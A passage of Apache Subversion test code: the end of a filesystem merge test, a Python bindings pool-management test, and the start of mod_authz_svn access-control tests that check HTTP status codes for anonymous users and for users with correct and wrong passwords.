SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (2) E exists in both ANCESTOR and A, but refers to different
# revisions of the same node.
# (1a) E exists in both ANCESTOR and B, but refers to different
# revisions of the same file node. Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "A/B/lambda",
"A different change to 'lambda'.\n")
after_rev = self.check_commit_txn(txn, "/A/B/lambda")
fs.abort_txn(txn)
# (1b) E exists in both ANCESTOR and B, but refers to different
# revisions of the same directory node. Merge A/E and B/E,
# recursively. Succeed, because no conflict beneath E.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/D/G/nu")
svn_test__set_file_contents(txn_root, "A/D/G/nu",
"This is the file 'nu'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 13
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"Change to file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/G/nu",
"This is the file 'nu'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (1c) E exists in both ANCESTOR and B, but refers to different
# revisions of the same directory node. Merge A/E and B/E,
# recursively. Fail, because conflict beneath E.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/D/G/xi")
svn_test__set_file_contents(txn_root, "A/D/G/xi",
"This is a different file 'xi'.\n")
after_rev = self.check_commit_txn(txn, "/A/D/G/xi")
fs.abort_txn(txn)
# (1) E exists in both ANCESTOR and B, and refers to the same node
# revision. Replace E with A's node revision.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
old_lambda_ctnts = svn_test__get_file_contents(txn_root, "A/B/lambda")
if (not isinstance(old_lambda_ctnts, str)
or old_lambda_ctnts != "This is the file 'lambda'.\n"):
raise core.SubversionException(
"got wrong contents from an old revision tree",
core.SVN_ERR_FS_GENERAL)
svn_test__set_file_contents(txn_root, "A/D/G/rho",
"This is an irrelevant change to 'rho'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 14
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"Change to file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is an irrelevant change to 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/G/nu",
"This is the file 'nu'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (1) E exists in both ANCESTOR and A, and refers to the same node
# revision.
# (1) E exists in both ANCESTOR and B, and refers to the same
# node revision. Nothing has happened to ANCESTOR/E, so no
# change is necessary.
# This has now been tested about fifty-four trillion times. We
# don't need to test it again here.
# E exists in ANCESTOR, but has been deleted from A. E exists in
# both ANCESTOR and B but refers to different revisions of the same
# node. Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "iota",
"New contents for 'iota'.\n")
after_rev = self.check_commit_txn(txn, "/iota")
fs.abort_txn(txn)
return
def suite():
return unittest.defaultTestLoader.loadTestsFromTestCase(
SubversionFSTestCase)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
```
#### File: python/tests/pool.py
```python
import unittest, weakref, setup_path
import os, tempfile, gc
import svn.core, svn.client, libsvn.core
from svn.core import *
from libsvn.core import application_pool, GenericSWIGWrapper
import utils
# Test case for the new automatic pool management infrastructure
class PoolTestCase(unittest.TestCase):
def assertNotNone(self, value):
"""Assert that the specified value is not None"""
return self.assertNotEqual(value, None)
def assertNone(self, value):
"""Assert that the specified value is None"""
return self.assertEqual(value, None)
def test_object_struct_members(self):
"""Check that object struct members work correctly"""
# Test good object assignment operations
client_ctx = svn.client.svn_client_create_context()
auth = svn.core.svn_auth_open([])
client_ctx.auth_baton = auth
# Check that parent pools are set correctly on struct accesses
self.assertEqual(client_ctx.auth_baton._parent_pool, auth._parent_pool)
# Test bad object assignment operations
def test_bad_assignment(self):
head_revision = svn.core.svn_opt_revision_t()
head_revision.kind = auth
self.assertRaises(TypeError, test_bad_assignment)
def test_object_hash_struct_members(self):
"""Check that struct members which are hashes of objects work correctly"""
cfg = svn.core.svn_config_create(False)
client_ctx = svn.client.svn_client_create_context()
category = svn.core.SVN_CONFIG_CATEGORY_SERVERS
client_ctx.config = { category: cfg }
# Check that parent pools are set correctly
self.assertEqual(client_ctx.config[category]._parent_pool,
cfg._parent_pool)
# Test invalid assignment
def test_bad_assignment(self):
client_ctx.config = 42
self.assertRaises(TypeError, test_bad_assignment)
def test_assert_valid(self):
"""Test assert_valid method on proxy objects"""
# Test assert_valid with destroy()
client_ctx = svn.client.svn_client_create_context()
auth = svn.core.svn_auth_open([])
wrapped_auth = GenericSWIGWrapper(auth, auth._parent_pool)
client_ctx.auth_baton = auth
auth.assert_valid()
wrapped_auth.assert_valid()
client_ctx.auth_baton.assert_valid()
auth._parent_pool.destroy()
self.assertRaises(AssertionError, lambda: auth.assert_valid())
self.assertRaises(AssertionError, lambda: wrapped_auth.assert_valid())
self.assertRaises(AssertionError, lambda: client_ctx.auth_baton)
# Test assert_valid with clear()
client_ctx = svn.client.svn_client_create_context()
auth = svn.core.svn_auth_open([])
wrapped_auth = GenericSWIGWrapper(auth, auth._parent_pool)
client_ctx.auth_baton = auth
auth.assert_valid()
wrapped_auth.assert_valid()
client_ctx.auth_baton.assert_valid()
auth._parent_pool.clear()
self.assertRaises(AssertionError, lambda: auth.assert_valid())
self.assertRaises(AssertionError, lambda: wrapped_auth.assert_valid())
self.assertRaises(AssertionError, lambda: client_ctx.auth_baton)
def test_integer_struct_members(self):
"""Check that integer struct members work correctly"""
# Test good integer assignment operations
rev = svn.core.svn_opt_revision_t()
rev.kind = svn.core.svn_opt_revision_number
rev.value.number = 10
self.assertEqual(rev.kind, svn.core.svn_opt_revision_number)
self.assertEqual(rev.value.number, 10)
# Test bad integer assignment operations
def test_bad_assignment(self):
client_ctx = svn.client.svn_client_create_context()
client_ctx.config = 2
self.assertRaises(TypeError, test_bad_assignment)
def test_pool(self):
# Create pools
parent_pool = Pool()
parent_pool_ref = weakref.ref(parent_pool)
pool = Pool(Pool(parent_pool))
pool = Pool(pool)
# Make sure proper exceptions are raised with incorrect input
self.assertRaises(TypeError, lambda: Pool("abcd"))
# Check that garbage collection is working OK
self.assertNotNone(parent_pool_ref())
top_pool_ref = weakref.ref(parent_pool._parent_pool)
del parent_pool
self.assertNotNone(parent_pool_ref())
self.assertNotNone(top_pool_ref())
pool.clear()
newpool = libsvn.core.svn_pool_create(pool)
libsvn.core.apr_pool_destroy(newpool)
self.assertNotNone(newpool)
pool.clear()
self.assertNotNone(parent_pool_ref())
del pool
self.assertNotNone(parent_pool_ref())
del newpool
self.assertNone(parent_pool_ref())
self.assertNone(top_pool_ref())
# Make sure anonymous pools are destroyed properly
anonymous_pool_ref = weakref.ref(Pool())
self.assertNone(anonymous_pool_ref())
def test_compatibility_layer(self):
# Create a new pool
pool = Pool()
parent_pool_ref = weakref.ref(pool)
pool = svn_pool_create(Pool(pool))
pool_ref = weakref.ref(pool)
# Make sure proper exceptions are raised with incorrect input
self.assertRaises(TypeError, lambda: svn_pool_create("abcd"))
# Test whether pools are destroyed properly
pool = svn_pool_create(pool)
self.assertNotNone(pool_ref())
self.assertNotNone(parent_pool_ref())
del pool
self.assertNone(pool_ref())
self.assertNone(parent_pool_ref())
# Ensure that AssertionErrors are raised when a pool is deleted twice
newpool = Pool()
newpool2 = Pool(newpool)
svn_pool_clear(newpool)
self.assertRaises(AssertionError, lambda: libsvn.core.apr_pool_destroy(newpool2))
self.assertRaises(AssertionError, lambda: svn_pool_destroy(newpool2))
svn_pool_destroy(newpool)
self.assertRaises(AssertionError, lambda: svn_pool_destroy(newpool))
# Try to allocate memory from a destroyed pool
self.assertRaises(AssertionError, lambda: svn_pool_create(newpool))
# Create and destroy a pool
svn_pool_destroy(svn_pool_create())
# Make sure anonymous pools are destroyed properly
anonymous_pool_ref = weakref.ref(svn_pool_create())
self.assertNone(anonymous_pool_ref())
# Try to cause a segfault using apr_terminate
svn.core.apr_terminate()
svn.core.apr_initialize()
svn.core.apr_terminate()
svn.core.apr_terminate()
# Destroy the application pool
svn_pool_destroy(libsvn.core.application_pool)
# Double check that the application pool has been deleted
self.assertNone(libsvn.core.application_pool)
# Try to allocate memory from the old application pool
self.assertRaises(AssertionError, lambda: svn_pool_create(application_pool))
# Bring the application pool back to life
svn_pool_create()
# Double check that the application pool has been created
self.assertNotNone(libsvn.core.application_pool)
# We can still destroy and create pools at will
svn_pool_destroy(svn_pool_create())
def _test_pools_in_circular_reference(self, finalizer=False):
class Circular(object):
def __init__(self, pool):
self.pool = pool
self.loop = None
if finalizer:
def __del__(self):
self.pool = self.loop = None
def create_circularl():
pool = Pool(libsvn.core.application_pool)
subpool1 = Pool(pool)
subpool2 = Pool(pool)
circularly1 = Circular(pool)
circularly2 = Circular(subpool2)
circularly3 = Circular(subpool1)
circularly1.loop = circularly3
circularly2.loop = circularly1
circularly3.loop = circularly2
refs = weakref.WeakValueDictionary()
refs['pool'] = pool
refs['subpool1'] = subpool1
refs['subpool2'] = subpool2
return refs
refs = create_circularl()
self.assertEqual({'pool', 'subpool1', 'subpool2'},
set(name for name, pool in refs.items()
if pool is not None))
gc.collect()
self.assertEqual(set(), set(name for name, pool in refs.items()
if pool is not None))
def test_pools_in_circular_reference_without_finalizer(self):
self._test_pools_in_circular_reference(finalizer=False)
@unittest.skipIf(not utils.IS_PY3,
"Python 2 cannot collect garbage which involves circular "
"references with finalizer")
def test_pools_in_circular_reference_with_finalizer(self):
self._test_pools_in_circular_reference(finalizer=True)
def suite():
return unittest.defaultTestLoader.loadTestsFromTestCase(PoolTestCase)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
```
#### File: tests/cmdline/mod_authz_svn_tests.py
```python
import os, re, logging, shutil
logger = logging.getLogger()
# Our testing module
import svntest
# (abbreviation)
Skip = svntest.testcase.Skip_deco
SkipUnless = svntest.testcase.SkipUnless_deco
XFail = svntest.testcase.XFail_deco
Issues = svntest.testcase.Issues_deco
Issue = svntest.testcase.Issue_deco
Wimp = svntest.testcase.Wimp_deco
ls_of_D_no_H = '''<html><head><title>repos - Revision 1: /A/D</title></head>
<body>
<h2>repos - Revision 1: /A/D</h2>
<ul>
<li><a href="../">..</a></li>
<li><a href="G/">G/</a></li>
<li><a href="gamma">gamma</a></li>
</ul>
</body></html>'''
ls_of_D_H = '''<html><head><title>repos - Revision 1: /A/D</title></head>
<body>
<h2>repos - Revision 1: /A/D</h2>
<ul>
<li><a href="../">..</a></li>
<li><a href="G/">G/</a></li>
<li><a href="H/">H/</a></li>
<li><a href="gamma">gamma</a></li>
</ul>
</body></html>'''
ls_of_H = '''<html><head><title>repos - Revision 1: /A/D/H</title></head>
<body>
<h2>repos - Revision 1: /A/D/H</h2>
<ul>
<li><a href="../">..</a></li>
<li><a href="chi">chi</a></li>
<li><a href="omega">omega</a></li>
<li><a href="psi">psi</a></li>
</ul>
</body></html>'''
user1 = svntest.main.wc_author
user1_upper = user1.upper()
user1_pass = svntest.main.wc_passwd
user1_badpass = '<PASSWORD>'
assert user1_pass != user1_badpass, "Passwords can't match"
user2 = svntest.main.wc_author2
user2_upper = user2.upper()
user2_pass = svntest.main.wc_passwd
user2_badpass = '<PASSWORD>'
assert user2_pass != user2_badpass, "Passwords can't match"
def write_authz_file(sbox):
svntest.main.write_authz_file(sbox, {
'/': '$anonymous = r\n' +
'jrandom = rw\n' +
'jconstant = rw',
'/A/D/H': '$anonymous =\n' +
'$authenticated =\n' +
'jrandom = rw'
})
def write_authz_file_groups(sbox):
authz_name = sbox.authz_name()
svntest.main.write_authz_file(sbox,{
'/': '* =',
})
def verify_get(test_area_url, path, user, pw,
expected_status, expected_body, headers):
import base64
req_url = test_area_url + path
h = svntest.main.create_http_connection(req_url, 0)
if headers is None:
headers = {}
if user and pw:
auth_info = user + ':' + pw
user_pw = base64.b64encode(auth_info.encode()).decode()
headers['Authorization'] = 'Basic ' + user_pw
else:
auth_info = "anonymous"
h.request('GET', req_url, None, headers)
r = h.getresponse()
actual_status = r.status
if expected_status and expected_status != actual_status:
logger.warn("Expected status '" + str(expected_status) +
"' but got '" + str(actual_status) +
"' on url '" + req_url + "' (" +
auth_info + ").")
raise svntest.Failure
if expected_body:
actual_body = r.read()
if isinstance(expected_body, str) and not isinstance(actual_body, str):
actual_body = actual_body.decode()
if expected_body != actual_body:
logger.warn("Expected body:")
logger.warn(expected_body)
logger.warn("But got:")
logger.warn(actual_body)
logger.warn("on url '" + req_url + "' (" + auth_info + ").")
raise svntest.Failure
def verify_gets(test_area_url, tests):
for test in tests:
verify_get(test_area_url, test['path'], test.get('user'), test.get('pw'),
test['status'], test.get('body'), test.get('headers'))
######################################################################
# Tests
#
# Each test must return on success or raise on failure.
#----------------------------------------------------------------------
@SkipUnless(svntest.main.is_ra_type_dav)
def anon(sbox):
"test anonymous access"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/anon')
write_authz_file(sbox)
anon_tests = (
{ 'path': '', 'status': 301 },
{ 'path': '/', 'status': 200 },
{ 'path': '/repos', 'status': 301 },
{ 'path': '/repos/', 'status': 200 },
{ 'path': '/repos/A', 'status': 301 },
{ 'path': '/repos/A/', 'status': 200 },
{ 'path': '/repos/A/D', 'status': 301 },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H },
{ 'path': '/repos/A/D/gamma', 'status': 200 },
{ 'path': '/repos/A/D/H', 'status': 403 },
{ 'path': '/repos/A/D/H/', 'status': 403 },
{ 'path': '/repos/A/D/H/chi', 'status': 403 },
# auth isn't configured so nothing should change when passing
# authn details
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, anon_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def mixed(sbox):
"test mixed anonymous and authenticated access"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/mixed')
write_authz_file(sbox)
mixed_tests = (
{ 'path': '', 'status': 301, },
{ 'path': '/', 'status': 200, },
{ 'path': '/repos', 'status': 301, },
{ 'path': '/repos/', 'status': 200, },
{ 'path': '/repos/A', 'status': 301, },
{ 'path': '/repos/A/', 'status': 200, },
{ 'path': '/repos/A/D', 'status': 301, },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
},
{ 'path': '/repos/A/D/gamma', 'status': 200, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, mixed_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
@XFail(svntest.main.is_httpd_authz_provider_enabled)
# uses the AuthzSVNNoAuthWhenAnonymousAllowed On directive
# this is broken with httpd 2.3.x+ since it requires the auth system to accept
# r->user == NULL and there is a test for this in server/request.c now. It
# was intended as a workaround for the lack of Satisfy Any in 2.3.x+ which
# was resolved by httpd with mod_access_compat in 2.3.x+.
def mixed_noauthwhenanon(sbox):
"test mixed with noauthwhenanon directive"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/mixed-noauthwhenanon')
write_authz_file(sbox)
noauthwhenanon_tests = (
{ 'path': '', 'status': 301, },
{ 'path': '/', 'status': 200, },
{ 'path': '/repos', 'status': 301, },
{ 'path': '/repos/', 'status': 200, },
{ 'path': '/repos/A', 'status': 301, },
{ 'path': '/repos/A/', 'status': 200, },
{ 'path': '/repos/A/D', 'status': 301, },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
},
{ 'path': '/repos/A/D/gamma', 'status': 200, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
# note that unlike doing this with Satisfy Any this case
# actually provides anon access when provided with an invalid
# password
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
